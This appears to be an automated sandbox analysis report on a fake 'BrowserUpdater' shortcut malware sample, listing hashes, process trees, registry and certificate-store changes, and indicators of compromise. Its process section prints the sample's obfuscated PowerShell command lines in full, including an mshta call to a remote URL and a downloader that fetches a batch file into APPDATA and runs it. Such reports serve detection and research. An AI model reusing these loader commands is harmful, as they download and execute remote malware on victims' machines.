Resubmissions
07-08-2024 21:06
240807-zxvl6sxfkf 1006-08-2024 20:12
240806-yzbfmssgqc 1006-08-2024 19:51
240806-yk45eaydrn 10Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
06-08-2024 19:51
Static task
static1
Behavioral task
behavioral1
Sample
BrowserUpdater.vhd
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
BrowserUpdater.vhd
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
out.vhd
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
out.vhd
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
BrowserUpdater.lnk
Resource
win7-20240708-en
Behavioral task
behavioral6
Sample
BrowserUpdater.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
System Volume Information/WPSettings.dat
Resource
win7-20240704-en
Behavioral task
behavioral8
Sample
System Volume Information/WPSettings.dat
Resource
win10v2004-20240802-en
General
-
Target
BrowserUpdater.lnk
-
Size
2KB
-
MD5
7ed0b7e22f568d2eedaf956ba831d0a6
-
SHA1
c073465e6ca109f2069f2e26f28525e66da54bee
-
SHA256
7a6ad3868f0223896ceea378a056b2568ad6f6ca2e65baaa7b55e1033da3abd7
-
SHA512
c718e67fb2554d7bbbac60a1a3dae6fe6bcdf4c06c0cababd8b623d52f1d306f9441c27deaaff269e129fb0dcecb17430480b1941b14d95a01d3ffd4c87887cd
Malware Config
Extracted
https://redr.me/g3boil/
Signatures
-
Blocklisted process makes network request 12 IoCs
flow pid Process 5 2584 mshta.exe 7 2584 mshta.exe 9 2584 mshta.exe 11 2584 mshta.exe 13 2584 mshta.exe 15 2584 mshta.exe 17 2584 mshta.exe 19 2584 mshta.exe 20 2584 mshta.exe 21 2584 mshta.exe 22 1316 powershell.exe 23 1316 powershell.exe -
pid Process 2932 powershell.exe 1316 powershell.exe 1316 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 mshta.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e mshta.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2932 powershell.exe 1316 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2932 powershell.exe Token: SeDebugPrivilege 1316 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2360 wrote to memory of 2932 2360 cmd.exe 32 PID 2360 wrote to memory of 2932 2360 cmd.exe 32 PID 2360 wrote to memory of 2932 2360 cmd.exe 32 PID 2932 wrote to memory of 2584 2932 powershell.exe 33 PID 2932 wrote to memory of 2584 2932 powershell.exe 33 PID 2932 wrote to memory of 2584 2932 powershell.exe 33 PID 2584 wrote to memory of 1316 2584 mshta.exe 35 PID 2584 wrote to memory of 1316 2584 mshta.exe 35 PID 2584 wrote to memory of 1316 2584 mshta.exe 35
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\BrowserUpdater.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $C='.dmsi:aLSretpobg3hl/'; &(-join($C[(-612+615),(909-903),(148-141)])) :* (-join($C[(-612+615),(909-903),(148-141)])); :* %\ (-join($C[(410-408),(-612+615),(429-412),(-438+449),(909-903)])); foreach($p in @((371-354),(-821+832),(335-324),(-207+219),(-654+657),(740-735),(-129+148),(890-871),(222-213),(-354+364),(-800+801),(683-674),(550-550),(261-259),(462-452),(938-919),(-453+468),(-790+806),(-864+878),(749-736),(-625+629),(626-608),(-363+382))){$Y+=$C[$p]}; %\ $Y;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://redr.me/g3boil/3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function uqAehMaIe($NJTwTbrMX, $XJZkVi){[IO.File]::WriteAllBytes($NJTwTbrMX, $XJZkVi)};function apapZoXr($NJTwTbrMX){if($NJTwTbrMX.EndsWith((yNrVuHrL @(59913,59967,59975,59975))) -eq $True){Start-Process (yNrVuHrL @(59981,59984,59977,59967,59975,59975,59918,59917,59913,59968,59987,59968)) $NJTwTbrMX}else{Start-Process $NJTwTbrMX}};function gqcoIri($AHPcmYwv){$WfBZy = New-Object (yNrVuHrL @(59945,59968,59983,59913,59954,59968,59965,59934,59975,59972,59968,59977,59983));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$XJZkVi = $WfBZy.DownloadData($AHPcmYwv);return $XJZkVi};function yNrVuHrL($nIhcvb){$kXpIyeO=59867;$yoiSqUYc=$Null;foreach($SdAaMQf in $nIhcvb){$yoiSqUYc+=[char]($SdAaMQf-$kXpIyeO)};return $yoiSqUYc};function ZIxEQA(){$AQGzE = $env:APPDATA + '\';$tvNCPRFAm = gqcoIri (yNrVuHrL @(59971,59983,59983,59979,59982,59925,59914,59914,59970,59972,59983,59971,59984,59965,59913,59966,59978,59976,59914,59933,59981,59978,59986,59982,59968,59981,59934,59978,59976,59979,59964,59977,59988,59943,59943,59934,59914,59912,59916,59917,59914,59981,59968,59975,59968,59964,59982,59968,59982,59914,59967,59978,59986,59977,59975,59978,59964,59967,59914,59982,59968,59976,59983,59964,59970,59914,59934,59975,59978,59984,59967,59913,59965,59964,59983));$CRARBv = $AQGzE + 'Cloud.bat';uqAehMaIe $CRARBv $tvNCPRFAm;apapZoXr $CRARBv;;;;}ZIxEQA;4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1316
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5501e7af7203d914f43f5742ced4752a5
SHA109a6733b8e8506095fab9fb9b5891cb430de28ec
SHA2569bf85d074d84ceaf5991f68c89521c3b523e6e80bfcdd099afb3100e926d1ff6
SHA512feb91ab7b0338030865ddc66ebffe0bc4e30393c8ab36c7a4a52d6c7341ac154dc3a722afcd9d353fc6f97b286f5a93fb1151d25b2f625c0197ea3d28917fd8f
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b